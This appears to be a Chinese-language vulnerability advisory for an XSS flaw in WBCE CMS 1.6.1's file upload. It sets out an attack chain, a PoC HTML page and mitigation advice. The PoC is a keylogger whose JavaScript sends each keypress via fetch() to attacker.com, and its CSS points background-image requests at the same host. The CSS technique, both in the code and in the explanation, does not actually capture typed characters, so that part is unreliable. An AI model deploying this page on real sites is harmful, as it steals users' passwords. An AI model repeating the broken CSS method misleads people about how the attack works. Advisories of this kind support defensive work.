CVE-2023-53901 WBCE CMS 1.6.1跨站脚本漏洞可被利用窃取用户密码

漏洞信息

漏洞编号

CVE-2023-53901

漏洞类型

XSS跨站脚本

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WBCE CMS

漏洞概述

CVE-2023-53901是WBCE CMS 1.6.1版本中的一个中危跨站脚本（XSS）漏洞。该漏洞允许未经认证的攻击者通过上传精心构造的HTML文件来注入恶意HTML和CSS代码。攻击者利用CSS键盘记录技术，可以在用户不知情的情况下捕获用户在网页表单中输入的敏感信息，特别是密码字符。当用户访问包含恶意代码的页面时，攻击者可以通过后台图片请求的方式记录用户的每一次按键操作，从而实现对用户凭证的窃取。该漏洞的CVSS评分为5.4，属于中等严重程度，攻击向量为网络，攻击复杂度低，无需认证，但需要用户交互。由于该漏洞影响CMS内容管理系统的核心上传功能，攻击者可以轻易地在受影响的网站上部署恶意代码，对大量用户造成安全威胁。

技术细节

该漏洞存在于WBCE CMS的文件上传功能中。攻击者首先构造一个包含CSS键盘记录技术的恶意HTML文件，该文件使用CSS的background-image属性配合JavaScript来捕获用户输入。当用户在该HTML页面上输入任何字符时，恶意代码会通过CSS背景图片请求将这些字符发送到攻击者控制的服务器。具体实现方式是在CSS中使用:nth-child()选择器配合content属性，为每个可能的输入字符定义不同的background-image URL。当用户按下某个键时，对应的字符选择器被触发，导致浏览器向攻击者的服务器发起图片请求，从而泄露用户输入的内容。由于WBCE CMS 1.6.1在文件上传时未对HTML文件内容进行充分的XSS过滤，攻击者可以成功上传包含恶意代码的HTML文件，并在网站上托管这些恶意内容。一旦其他用户访问该页面，其输入的敏感信息就会被窃取。

攻击链分析

STEP 1

步骤1：侦察和信息收集

攻击者首先识别目标网站使用的CMS系统，确认其为WBCE CMS 1.6.1版本，并发现其文件上传功能存在XSS过滤不足的问题

STEP 2

步骤2：构造恶意载荷

攻击者创建一个包含CSS键盘记录技术的HTML文件，使用background-image属性配合CSS选择器来捕获用户按键，或使用JavaScript监听键盘事件

STEP 3

步骤3：上传恶意文件

攻击者通过WBCE CMS的文件上传功能上传构造好的恶意HTML文件，由于系统未对HTML内容进行充分的XSS过滤，上传成功

STEP 4

步骤4：诱骗用户访问

攻击者通过社会工程学手段（如钓鱼邮件、恶意链接等）诱使目标用户访问包含恶意代码的页面

STEP 5

步骤5：窃取敏感信息

当用户在页面上输入敏感信息（如密码）时，恶意代码通过CSS背景图片请求或JavaScript fetch API将用户输入的每个字符发送到攻击者控制的服务器

STEP 6

步骤6：收集和分析数据

攻击者收集所有窃取的字符数据，重建用户的密码或其他敏感信息，用于后续的账户接管或其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2023-53901 PoC - CSS Keylogger for WBCE CMS -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style>
        /* CSS Keylogger - Capture keystrokes via background-image requests */
        input {
            padding: 10px;
            width: 300px;
        }
        /* Define keylog styles for each character */
        input:nth-child(1):hover { background-image: url('https://attacker.com/log?key=a'); }
        input:nth-child(2):hover { background-image: url('https://attacker.com/log?key=b'); }
        /* Additional key mappings... */
        
        /* Alternative: Using keypress events */
        .keylogger {
            position: relative;
        }
        .keylogger input {
            outline: none;
        }
        
        /* CSS-based keylogger using content property */
        @keyframes keylog {
            0% { background-image: url('https://attacker.com/k?q=0'); }
            25% { background-image: url('https://attacker.com/k?q=25'); }
            50% { background-image: url('https://attacker.com/k?q=50'); }
            75% { background-image: url('https://attacker.com/k?q=75'); }
            100% { background-image: url('https://attacker.com/k?q=100'); }
        }
    </style>
</head>
<body>
    <h2>Document Upload</h2>
    <form>
        <input type="text" placeholder="Username" class="keylogger">
        <input type="password" placeholder="Password" class="keylogger">
    </form>
    <script>
        // JavaScript-based keylogger (backup method)
        document.querySelectorAll('input').forEach(input => {
            input.addEventListener('keypress', function(e) {
                fetch('https://attacker.com/log?char=' + e.key);
            });
        });
    </script>
</body>
</html>

影响范围

WBCE CMS 1.6.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）禁用或限制文件上传功能的使用；2）对上传的HTML文件进行内容安全审查和手动清理；3）配置服务器对上传目录设置严格的访问控制，禁用脚本执行；4）启用浏览器的XSS过滤器功能；5）监控和审计文件上传行为，及时发现异常上传活动；6）限制用户输入表单的输入长度和字符类型，降低键盘记录攻击的有效性。